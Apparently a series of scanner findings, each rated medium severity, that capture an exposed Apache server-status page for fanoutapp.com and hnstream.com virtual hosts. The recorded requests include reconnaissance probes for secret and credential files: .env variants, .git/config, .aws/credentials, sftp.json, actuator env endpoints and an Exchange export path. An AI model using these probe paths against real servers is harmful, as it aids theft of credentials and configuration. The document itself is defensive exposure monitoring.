Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Saturday, 22-Feb-2025 10:21:55 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 44 Parent Server MPM Generation: 43 Server uptime: 42 days 11 hours 42 minutes 57 seconds Server load: 0.06 0.21 0.16 Total accesses: 44703 - Total Traffic: 129.9 MB - Total Duration: 608514 CPU Usage: u61.53 s102.43 cu869.27 cs316.49 - .0368% CPU load .0122 requests/sec - 37 B/second - 3047 B/request - 13.6124 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03788778no1yes025010 23788779no1yes124010 Sum202 149020 _________________________.........................______________ _____W_____..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4337887780/23/750_ 0.5113126090.00.132.00 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-4337887780/22/736_ 0.5113124950.00.052.32 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-4337887780/13/720_ 0.48309191040.00.032.12 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4337887780/21/756_ 0.5103116370.00.052.10 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 0-4337887780/14/691_ 0.510399510.00.111.75 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-4337887780/14/726_ 0.4930917112160.00.032.15 127.0.0.1http/1.1api.hnstream.com:8000GET /form.html HTTP/1.1 0-4337887780/13/734_ 0.493095103950.00.042.04 127.0.0.1http/1.1api.hnstream.com:8000GET /t4 HTTP/1.1 0-4337887780/20/735_ 0.49309696450.00.202.02 127.0.0.1http/1.1api.hnstream.com:8000GET /upl.php HTTP/1.1 0-4337887780/17/720_ 0.49308493400.00.042.34 127.0.0.1http/1.1api.hnstream.com:8000GET /geoip/ HTTP/1.1 0-4337887780/21/758_ 0.503084112010.00.052.30 127.0.0.1http/1.1api.hnstream.com:8000GET /1.php HTTP/1.1 0-4337887780/20/715_ 0.493087103820.00.192.15 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 0-4337887780/19/732_ 0.503084106250.00.052.24 127.0.0.1http/1.1api.hnstream.com:8000GET /systembc/password.php HTTP/1.1 0-4337887780/12/709_ 0.50523100990.00.111.95 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-4337887780/18/744_ 0.503084105980.00.041.94 127.0.0.1http/1.1api.hnstream.com:8000GET /password.php HTTP/1.1 0-4337887780/18/720_ 0.433033105050.00.041.88 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /phpinfo.php HTTP/1.1 0-4337887780/17/738_ 0.50417128460.00.032.06 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-4337887780/21/720_ 0.5045121770.00.081.90 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-4337887780/20/733_ 0.505384980.00.122.46 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-4337887780/21/739_ 0.513489640.00.062.20 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4337887780/21/729_ 0.503387800.00.061.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-4337887780/17/706_ 0.513496430.00.041.82 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4337887780/16/742_ 0.512389640.00.041.93 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4337887780/17/719_ 0.512397060.00.051.98 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4337887780/18/738_ 0.512381270.00.132.00 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4337887780/20/726_ 0.510399370.00.042.28 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-41-0/0/572. 0.00123687192910.00.001.99 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/566. 0.00123687492890.00.001.60 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 1-41-0/0/551. 0.001236872671380.00.001.87 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 1-41-0/0/570. 0.001236871174840.00.002.04 127.0.0.1http/1.1api.hnstream.com:8000GET /sitemap.xml HTTP/1.1 1-41-0/0/577. 0.00123687388730.00.001.76 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /node_modules/.env HTTP/1.1 1-41-0/0/564. 0.00123687070610.00.001.76 45.91.171.220http/1.1api.hnstream.com:8000\x16\x03\x01 1-41-0/0/584. 0.00123687369020.00.002.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /laravel/.env.production HTTP/1.1 1-41-0/0/568. 0.00123687563000.00.001.75 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /static/chat/jquery-3.2.1.min.js HTTP/1.1 1-41-0/0/579. 0.00123687670490.00.001.60 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-41-0/0/562. 0.00123687077350.00.001.88 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-41-0/0/570. 0.00123687476630.00.001.91 147.185.133.181http/1.1api.hnstream.com:8000\x16\x03\x01 1-41-0/0/572. 0.00123687667370.00.001.88 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/565. 0.001236871259750.00.001.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.dev.local HTTP/1.1 1-41-0/0/560. 0.00123687668420.00.002.10 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/584. 0.00123687474080.00.001.87 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.template HTTP/1.1 1-41-0/0/560. 0.00123687363610.00.001.50 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.prod HTTP/1.1 1-41-0/0/575. 0.00123687465100.00.001.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /laravel/core/.env.local HTTP/1.1 1-41-0/0/582. 0.00123687380920.00.002.00 127.0.0.1http/1.1api.hnstream.com:8000GET /.aws/credentials HTTP/1.1 1-41-0/0/566. 0.00123687569260.00.001.77 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-41-0/0/546. 0.00123687464820.00.001.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /laravel/core/.env.staging HTTP/1.1 1-41-0/0/569. 0.00123687061800.00.001.95 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-41-0/0/559. 0.00123687368030.00.001.91 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-41-0/0/556. 0.00123687173980.00.002.03 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/555. 0.00123687364570.00.001.89 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/581. 0.001236872156490.00.001.66 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js H
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf10a2a8b1
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Thursday, 20-Feb-2025 12:47:51 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 42 Parent Server MPM Generation: 41 Server uptime: 40 days 14 hours 8 minutes 54 seconds Server load: 0.14 0.13 0.15 Total accesses: 41024 - Total Traffic: 118.2 MB - Total Duration: 584537 CPU Usage: u58.65 s97.56 cu820.86 cs300.19 - .0364% CPU load .0117 requests/sec - 35 B/second - 3022 B/request - 14.2487 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03619702no0yes124000 13619703no0yes025000 Sum200 149000 ____________________W_____________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4136197020/11/690_ 0.2928904123140.00.031.53 127.0.0.1http/1.1api.hnstream.com:8000GET /cOcH HTTP/1.1 0-4136197020/11/679_ 0.3403116270.00.022.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4136197020/9/675_ 0.311263084340.00.092.02 162.142.125.38http/1.1api.hnstream.com:8000PRI * HTTP/2.0 0-4136197020/11/702_ 0.30290011114020.00.021.96 170.64.134.120http/1.1 0-4136197020/9/645_ 0.322896197730.00.021.47 170.64.134.120http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4136197020/10/679_ 0.3027923108690.00.021.87 127.0.0.1http/1.1api.hnstream.com:8000GET /jquery-3.3.1.slim.min.js HTTP/1.1 0-4136197020/10/690_ 0.3312687102070.00.021.92 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4136197020/12/682_ 0.312890194040.00.031.72 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4136197020/11/673_ 0.331871791460.00.032.23 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4136197020/11/706_ 0.3327970108520.00.031.98 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-4136197020/12/663_ 0.31572897400.00.061.79 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /sitemap.xml.gz HTTP/1.1 0-4136197020/11/679_ 0.33626103060.00.052.09 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4136197020/14/664_ 0.3412398490.00.031.70 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-4136197020/11/696_ 0.3414103440.00.031.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-4136197020/11/673_ 0.3413103450.00.031.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-4136197020/12/689_ 0.3413125870.00.031.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-4136197020/12/666_ 0.3413119250.00.031.68 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-4136197020/13/682_ 0.340382970.00.032.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-4136197020/11/682_ 0.340385870.00.062.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-4136197020/11/680_ 0.340385510.00.031.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-41361970211/9/655W 0.320093140.00.021.69 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4136197020/12/696_ 0.340387870.00.041.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4136197020/10/667_ 0.311866188900.00.031.82 162.142.125.38http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4136197020/10/690_ 0.31531779150.00.031.81 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4136197020/12/675_ 0.335361796460.00.102.08 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-4136197030/8/519_ 0.391419490530.00.081.83 127.0.0.1http/1.1api.hnstream.com:8000GET /actuator/;/env HTTP/1.1 1-4136197030/15/518_ 0.391419391090.00.031.43 127.0.0.1http/1.1api.hnstream.com:8000GET /api/actuator/ HTTP/1.1 1-4136197030/17/502_ 0.391418369090.00.021.68 127.0.0.1http/1.1api.hnstream.com:8000GET /api/actuator/;/env HTTP/1.1 1-4136197030/9/521_ 0.391418372360.00.111.80 127.0.0.1http/1.1api.hnstream.com:8000GET /api/actuator/env HTTP/1.1 1-4136197030/8/527_ 0.391418386840.00.011.60 127.0.0.1http/1.1api.hnstream.com:8000GET /management/ HTTP/1.1 1-4136197030/15/517_ 0.391417368920.00.031.61 127.0.0.1http/1.1api.hnstream.com:8000GET /management/mappings HTTP/1.1 1-4136197030/10/534_ 0.391417366790.00.021.96 127.0.0.1http/1.1api.hnstream.com:8000GET /management/env HTTP/1.1 1-4136197030/12/522_ 0.391417361210.00.031.57 127.0.0.1http/1.1api.hnstream.com:8000GET /management/;/env HTTP/1.1 1-4136197030/12/528_ 0.391417368530.00.021.44 127.0.0.1http/1.1api.hnstream.com:8000GET /dev/actuator/ HTTP/1.1 1-4136197030/14/514_ 0.391417375520.00.031.66 127.0.0.1http/1.1api.hnstream.com:8000GET /dev/actuator/env HTTP/1.1 1-4136197030/10/522_ 0.391416374640.00.021.76 127.0.0.1http/1.1api.hnstream.com:8000GET /app/actuator/ HTTP/1.1 1-4136197030/13/526_ 0.391416365390.00.031.64 127.0.0.1http/1.1api.hnstream.com:8000GET /app/actuator/env HTTP/1.1 1-4136197030/11/519_ 0.381411357720.00.101.42 127.0.0.1http/1.1api.hnstream.com:8000GET /env.json HTTP/1.1 1-4136197030/12/511_ 0.401155465530.00.021.96 140.248.75.176http/1.1api.hnstream.com:8000GET /comments/items/?since=cursor: HTTP/1.1 1-4136197030/14/536_ 0.381150371410.00.031.72 127.0.0.1http/1.1api.hnstream.com:8000GET /js/base.js HTTP/1.1 1-4136197030/10/510_ 0.40665661520.00.021.35 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-4136197030/12/529_ 0.39660363230.00.021.62 127.0.0.1http/1.1api.hnstream.com:8000GET /js/configuration.js HTTP/1.1 1-4136197030/13/532_ 0.402278440.00.111.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-4136197030/12/517_ 0.401166670.00.181.62 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-4136197030/12/498_ 0.4011262870.00.051.36 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-4136197030/13/522_ 0.400360050.00.021.80 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4136197030/9/513_ 0.400466240.00.021.75 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 1-4136197030/11/508_ 0.400371760.00.021.85 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 1-4136197030/13/510_ 0.391419362360.00.171.74 127.0.0.1http/1.1api.hnstream.com:8000GET /actuator/env HTTP/1.1 1-4136197030/11/532_ 0.400354260.00.021.42 127
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfb227fb2a
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Tuesday, 18-Feb-2025 19:16:18 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 40 Parent Server MPM Generation: 39 Server uptime: 38 days 20 hours 37 minutes 20 seconds Server load: 0.51 0.23 0.17 Total accesses: 37835 - Total Traffic: 106.0 MB - Total Duration: 514018 CPU Usage: u56.45 s93.66 cu775.76 cs286.87 - .0361% CPU load .0113 requests/sec - 33 B/second - 2938 B/request - 13.5858 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03447519no0yes025000 13447520no0yes124000 Sum200 149000 _________________________________W________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3934475190/12/637_ 0.3706112040.00.021.40 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-3934475190/12/621_ 0.3402104990.00.022.04 127.0.0.1http/1.1 0-3934475190/12/627_ 0.360679350.00.021.83 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 0-3934475190/11/653_ 0.360499010.00.021.80 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-3934475190/13/598_ 0.360384000.00.101.39 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3934475190/15/632_ 0.360294080.00.101.79 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-3934475190/15/637_ 0.360687730.00.031.81 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 0-3934475190/14/629_ 0.370179160.00.021.59 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3934475190/11/620_ 0.340280600.00.022.10 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3934475190/11/646_ 0.340788910.00.101.79 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3934475190/12/605_ 0.340291350.00.021.58 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3934475190/11/631_ 0.330788570.00.021.90 127.0.0.1http/1.1 0-3934475190/11/610_ 0.340383010.00.031.42 127.0.0.1http/1.1 0-3934475190/12/640_ 0.350888750.00.031.62 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3934475190/13/619_ 0.350195530.00.031.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3934475190/14/637_ 0.3501111890.00.031.69 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3934475190/14/615_ 0.350499740.00.101.49 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3934475190/13/628_ 0.340377440.00.022.07 127.0.0.1http/1.1 0-3934475190/9/627_ 0.350571780.00.021.85 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 0-3934475190/16/632_ 0.350480420.00.031.52 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3934475190/13/613_ 0.340380820.00.021.52 127.0.0.1http/1.1 0-3934475190/14/642_ 0.360373900.00.031.57 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-3934475190/16/609_ 0.360373990.00.031.60 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3934475190/14/643_ 0.360168650.00.041.65 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3934475190/13/627_ 0.360382250.00.031.91 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3934475200/19/456_ 0.450971580.00.121.57 127.0.0.1http/1.1 1-3934475200/19/449_ 0.450674800.00.041.20 127.0.0.1http/1.1 1-3934475200/15/441_ 0.480253640.00.041.44 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-3934475200/17/454_ 0.480251780.00.041.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-3934475200/20/468_ 0.480370990.00.041.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3934475200/16/455_ 0.480354120.00.141.46 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3934475200/18/467_ 0.470356290.00.181.69 127.0.0.1http/1.1 1-3934475200/17/457_ 0.470346120.00.191.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-39344752013/20/461W 0.450053780.00.041.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3934475200/16/445_ 0.470563960.00.041.40 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-3934475200/19/457_ 0.470358940.00.121.44 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3934475200/20/459_ 0.470351140.00.111.32 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3934475200/17/458_ 0.470243690.00.121.19 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /login.action HTTP/1.1 1-3934475200/19/449_ 0.460350120.00.181.58 127.0.0.1http/1.1 1-3934475200/19/465_ 0.470855290.00.211.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3934475200/19/449_ 0.470351860.00.041.19 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3934475200/18/465_ 0.460248070.00.111.39 127.0.0.1http/1.1 1-3934475200/21/467_ 0.470163940.00.121.51 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3934475200/16/452_ 0.470351370.00.031.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-3934475200/17/435_ 0.480352390.00.101.18 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3934475200/19/459_ 0.460349150.00.191.40 127.0.0.1http/1.1 1-3934475200/15/451_ 0.480256310.00.041.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-3934475200/19/440_ 0.480355940.00.251.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-3934475200/22/450_ 0.480443610.00.141.21 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /login.action HTTP/1.1 1-3934475200/15/465_ 0.480543190.00.111.27 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 2-31-0/0/453. 0.00674160810475<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf848f6fb0
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Tuesday, 18-Feb-2025 19:16:18 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 40 Parent Server MPM Generation: 39 Server uptime: 38 days 20 hours 37 minutes 20 seconds Server load: 0.51 0.23 0.17 Total accesses: 37814 - Total Traffic: 105.9 MB - Total Duration: 513942 CPU Usage: u56.43 s93.65 cu775.76 cs286.87 - .0361% CPU load .0113 requests/sec - 33 B/second - 2937 B/request - 13.5913 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03447519no0yes025000 13447520no0yes124000 Sum200 149000 __________________________________________W_______.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3934475190/11/636_ 0.3403111970.00.021.40 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3934475190/12/621_ 0.3402104990.00.022.04 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 0-3934475190/11/626_ 0.340679280.00.021.83 127.0.0.1http/1.1 0-3934475190/10/652_ 0.340498970.00.021.79 127.0.0.1http/1.1 0-3934475190/12/597_ 0.330483970.00.101.39 127.0.0.1http/1.1 0-3934475190/14/631_ 0.340494050.00.101.79 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3934475190/14/636_ 0.340887660.00.031.81 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 0-3934475190/13/628_ 0.340479140.00.021.58 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3934475190/11/620_ 0.340280600.00.022.10 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3934475190/11/646_ 0.340788910.00.101.79 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3934475190/12/605_ 0.340291350.00.021.58 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3934475190/11/631_ 0.330788570.00.021.90 127.0.0.1http/1.1 0-3934475190/11/610_ 0.340383010.00.031.42 127.0.0.1http/1.1 0-3934475190/12/640_ 0.350888750.00.031.62 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3934475190/13/619_ 0.350195530.00.031.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3934475190/14/637_ 0.3501111890.00.031.69 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3934475190/14/615_ 0.350499740.00.101.49 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3934475190/13/628_ 0.340377440.00.022.07 127.0.0.1http/1.1 0-3934475190/9/627_ 0.350571780.00.021.85 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 0-3934475190/16/632_ 0.350480420.00.031.52 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3934475190/13/613_ 0.340380820.00.021.52 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3934475190/13/641_ 0.340373870.00.031.57 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-3934475190/15/608_ 0.340573960.00.031.60 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3934475190/13/642_ 0.340568630.00.031.64 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3934475190/12/626_ 0.330582220.00.031.91 127.0.0.1http/1.1 1-3934475200/19/456_ 0.450971580.00.121.57 127.0.0.1http/1.1 1-3934475200/19/449_ 0.450674800.00.041.20 127.0.0.1http/1.1 1-3934475200/14/440_ 0.450353610.00.031.43 127.0.0.1http/1.1 1-3934475200/16/453_ 0.470251750.00.031.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3934475200/19/467_ 0.470470960.00.041.47 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3934475200/15/454_ 0.470454080.00.131.46 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-3934475200/18/467_ 0.470356290.00.181.69 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3934475200/17/457_ 0.470346120.00.191.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3934475200/20/461_ 0.450253780.00.041.12 127.0.0.1http/1.1 1-3934475200/16/445_ 0.470563960.00.041.40 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-3934475200/19/457_ 0.470358940.00.121.44 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3934475200/20/459_ 0.470351140.00.111.32 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3934475200/17/458_ 0.470243690.00.121.19 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET 